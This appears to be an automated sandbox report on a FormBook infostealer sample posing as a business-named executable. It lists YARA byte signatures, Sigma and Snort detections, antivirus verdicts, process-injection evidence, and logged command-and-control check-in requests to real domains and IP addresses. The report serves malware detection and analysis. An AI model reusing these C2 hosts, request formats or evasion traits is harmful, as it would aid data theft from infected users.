2.2.image.exe.3f466b0.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa0428:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa07c2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xac4d5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xabfc1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xac5d7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xac74f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa11da:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xab23c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa1f52:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xb19c7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xb2a6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.image.exe.3f466b0.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xae8f9:$sqlite3step: 68 34 1C 7B E1 0xaea0c:$sqlite3step: 68 34 1C 7B E1 0xae928:$sqlite3text: 68 38 2A 90 C5 0xaea4d:$sqlite3text: 68 38 2A 90 C5 0xae93b:$sqlite3blob: 68 53 D8 7F 8C 0xaea63:$sqlite3blob: 68 53 D8 7F 8C
5.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.RegSvcs.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.RegSvcs.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
5.0.RegSvcs.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.RegSvcs.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.RegSvcs.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
5.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.RegSvcs.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.RegSvcs.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
5.0.RegSvcs.exe.400000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.RegSvcs.exe.400000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.RegSvcs.exe.400000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
2.2.image.exe.2d15fd8.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
2.2.image.exe.2d15fd8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste	Detects executables potentially checking for WinJail sandbox window	ditekSHen	0xf904:$v1: SbieDll.dll 0xf91e:$v2: USER 0xf92a:$v3: SANDBOX 0xf93c:$v4: VIRUS 0xf98c:$v4: VIRUS 0xf94a:$v5: MALWARE 0xf95c:$v6: SCHMIDTI 0xf970:$v7: CURRENTUSER
2.2.image.exe.3d81990.4.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.image.exe.3d81990.4.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17b478:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x17b812:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1a4298:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1a4632:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x265148:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2654e2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x187525:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1b0345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2711f5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x187011:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1afe31:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x270ce1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x187627:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1b0447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x2712f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x18779f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1b05bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x27146f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x17c22a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1a504a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x265efa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
2.2.image.exe.3d81990.4.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x189949:$sqlite3step: 68 34 1C 7B E1 0x189a5c:$sqlite3step: 68 34 1C 7B E1 0x1b2769:$sqlite3step: 68 34 1C 7B E1 0x1b287c:$sqlite3step: 68 34 1C 7B E1 0x273619:$sqlite3step: 68 34 1C 7B E1 0x27372c:$sqlite3step: 68 34 1C 7B E1 0x189978:$sqlite3text: 68 38 2A 90 C5 0x189a9d:$sqlite3text: 68 38 2A 90 C5 0x1b2798:$sqlite3text: 68 38 2A 90 C5 0x1b28bd:$sqlite3text: 68 38 2A 90 C5 0x273648:$sqlite3text: 68 38 2A 90 C5 0x27376d:$sqlite3text: 68 38 2A 90 C5 0x18998b:$sqlite3blob: 68 53 D8 7F 8C 0x189ab3:$sqlite3blob: 68 53 D8 7F 8C 0x1b27ab:$sqlite3blob: 68 53 D8 7F 8C 0x1b28d3:$sqlite3blob: 68 53 D8 7F 8C 0x27365b:$sqlite3blob: 68 53 D8 7F 8C 0x273783:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 24 entries

Sigma Signatures

System Summary

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe, ParentImage: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe, ParentProcessId: 7008, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 5556

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth, Markus Neis, Sander Wiebing: Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe, ProcessId: 4520, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe, ProcessId: 4520, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0

Source: Process started

Author: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe, ParentImage: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe, ParentProcessId: 7008, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 5556

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.searchvity.com/	URL Reputation: Label: malware
Source: http://www.searchvity.com/?dn=	Avira URL Cloud: Label: malware
Source: http://www.fraiuhs.com/q36s/?1bGpqN=KaI0Rj3wcsIqg8Lge9r70qxIl2ZARFR6pw9QZ8eIk4lgB884W2uHm2Neex91t0JOAHKn&wFNT8=0jNDXxTXR8rtijfp	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Virustotal: Detection: 42%			Perma Link
Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	ReversingLabs: Detection: 59%

Yara detected FormBook

Source: Yara match	File source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.image.exe.3f466b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.image.exe.3d81990.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.384175389.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.385133356.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.821203089.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.355695163.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.821135364.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.303243710.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.303491951.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.338080470.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.306533185.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe

ReversingLabs: Detection: 44%

Source: 5.0.RegSvcs.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.RegSvcs.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.RegSvcs.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.RegSvcs.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

Code function: 0_2_00007FF6EB1430EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,

0_2_00007FF6EB1430EC

Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

Static PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source:	Binary string: wextract.pdb source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe, 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmp, 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe, 00000000.00000000.289878233.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: wextract.pdbGCTL source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe, 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmp, 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe, 00000000.00000000.289878233.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: RegSvcs.pdb, source: control.exe, 0000000B.00000002.821881250.0000000005377000.00000004.10000000.00040000.00000000.sdmp, d6wtv4o01bbhxt.exe, 0000001F.00000000.769697263.0000000000E62000.00000002.00000001.01000000.0000000A.sdmp, d6wtv4o01bbhxt.exe, 00000022.00000000.779698903.00000000008A2000.00000002.00000001.01000000.0000000A.sdmp, d6wtv4o01bbhxt.exe, 00000026.00000000.798301524.0000000000722000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000005.00000002.384460936.0000000000B3F000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000B.00000002.821610300.0000000004F5F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000B.00000002.821468138.0000000004E40000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: control.pdb source: RegSvcs.exe, 00000005.00000002.385472124.0000000002A20000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000005.00000002.384460936.0000000000B3F000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, control.exe, control.exe, 0000000B.00000002.821610300.0000000004F5F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000B.00000002.821468138.0000000004E40000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: control.pdbUGP source: RegSvcs.exe, 00000005.00000002.385472124.0000000002A20000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: control.exe, 0000000B.00000002.821881250.0000000005377000.00000004.10000000.00040000.00000000.sdmp, d6wtv4o01bbhxt.exe, d6wtv4o01bbhxt.exe, 0000001F.00000000.769697263.0000000000E62000.00000002.00000001.01000000.0000000A.sdmp, d6wtv4o01bbhxt.exe, 00000022.00000000.779698903.00000000008A2000.00000002.00000001.01000000.0000000A.sdmp, d6wtv4o01bbhxt.exe, 00000026.00000000.798301524.0000000000722000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\Client\Temp\ZIoqdPXfyq\src\obj\Debug\SZArrayHelp.pdb source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe, 00000000.00000003.290884636.00000268D6D00000.00000004.00000020.00020000.00000000.sdmp, 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe, 00000000.00000003.291017386.00000268D4EDA000.00000004.00000020.00020000.00000000.sdmp, image.exe, image.exe, 00000002.00000002.304872357.0000000000952000.00000002.00000001.01000000.00000004.sdmp

Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Code function: 0_2_00007FF6EB14204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00007FF6EB14204C
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E4FA90 FindFirstFileW,FindNextFileW,FindClose,	11_2_00E4FA90
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E4FA8B FindFirstFileW,FindNextFileW,FindClose,	11_2_00E4FA8B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop ebx		5_2_00406AB7
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop ebx		11_2_00E46AB7

Networking

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49833 -> 217.160.0.132:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49833 -> 217.160.0.132:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49833 -> 217.160.0.132:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49834 -> 162.0.233.84:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49834 -> 162.0.233.84:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49834 -> 162.0.233.84:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49837 -> 185.215.4.12:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49837 -> 185.215.4.12:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49837 -> 185.215.4.12:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 213.186.33.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.marketplaceimmo.com
Source: C:\Windows\explorer.exe	Network Connect: 162.0.233.84 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.okargo.pro
Source: C:\Windows\explorer.exe	Network Connect: 18.194.171.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.wxiw.xyz
Source: C:\Windows\explorer.exe	Domain query: www.real-market-34.xyz
Source: C:\Windows\explorer.exe	Network Connect: 217.160.0.132 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.96.160.139 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.215.4.12 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.cosmosmeta.com
Source: C:\Windows\explorer.exe	Domain query: www.oooci.com
Source: C:\Windows\explorer.exe	Network Connect: 52.20.84.62 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.unitedtrials.net
Source: C:\Windows\explorer.exe	Domain query: www.perfectselfstorageaston.com
Source: C:\Windows\explorer.exe	Domain query: www.fhpuyfpe.com
Source: C:\Windows\explorer.exe	Domain query: www.gestaltants.com
Source: C:\Windows\explorer.exe	Network Connect: 106.186.69.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.computershit.net
Source: C:\Windows\explorer.exe	Domain query: www.fraiuhs.com
Source: C:\Windows\explorer.exe	Domain query: www.marsmoose.com
Source: C:\Windows\explorer.exe	Network Connect: 134.122.133.172 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.tutorgpa.com
Source: C:\Windows\explorer.exe	Network Connect: 74.208.236.190 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.yokoi-tatami-lab.com
Source: C:\Windows\explorer.exe	Network Connect: 101.35.123.80 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.strickercosolutions.com
Source: C:\Windows\explorer.exe	Domain query: www.us-paypal.online
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.libertymarket.net
Source: C:\Windows\explorer.exe	Domain query: www.getbraintruth.com
Source: C:\Windows\explorer.exe	Network Connect: 104.21.36.34 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.punksparrow.com
Source: C:\Windows\explorer.exe	Domain query: www.boninvahas.club
Source: C:\Windows\explorer.exe	Domain query: www.drinco.club
Source: C:\Windows\explorer.exe	Domain query: www.flat-planet.com

Performs DNS queries to domains with low reputation

Source: C:\Windows\explorer.exe	DNS query: www.real-market-34.xyz
Source: C:\Windows\explorer.exe	DNS query: www.wxiw.xyz

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: www.boninvahas.club replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.tutorgpa.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.wxiw.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.drinco.club replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.us-paypal.online replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.marsmoose.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.real-market-34.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.libertymarket.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.strickercosolutions.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.punksparrow.com replaycode: Name error (3)

Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=qjehMM29YnjvQ+IsXXvHiKjxodx29m58RRND8kRaJ9rSQmiI4bNYuG3T9nEMHR/0ZqgQ&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1Host: www.fhpuyfpe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=tC61wDElLuFqXOy7bNjE3R/KY1KZZj+Oe9iJyNVpeVf3JMOvufdGkYhMQuQyKkTwQ1EL&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1Host: www.unitedtrials.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=IHzjIaKw9hHBssJHvR7q+BIW1etDJxSUidZLadnwIl9v5RmtoBh2/TNAfU7VUcX2DTn2&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1Host: www.oooci.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=VigMRdHlcuoP+Sw3yuFwqC380HsjzcbE0b4n2u2ieXC1OCRINUCS2txvQYXeentP/kMQ&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1Host: www.perfectselfstorageaston.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=u2o/mXnBhWEQf/pveWhGu62rKF+mK4qUp4dBBRZihtSbDfqqopE5TB84A5tdbEb+PdMV&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1Host: www.computershit.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=+82WZbOcHchnV2OkjKF3NixdkboeLFcgXndQeltEW38JzDdOoRl+u1EVmT0W3Jonz/Y6&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1Host: www.getbraintruth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
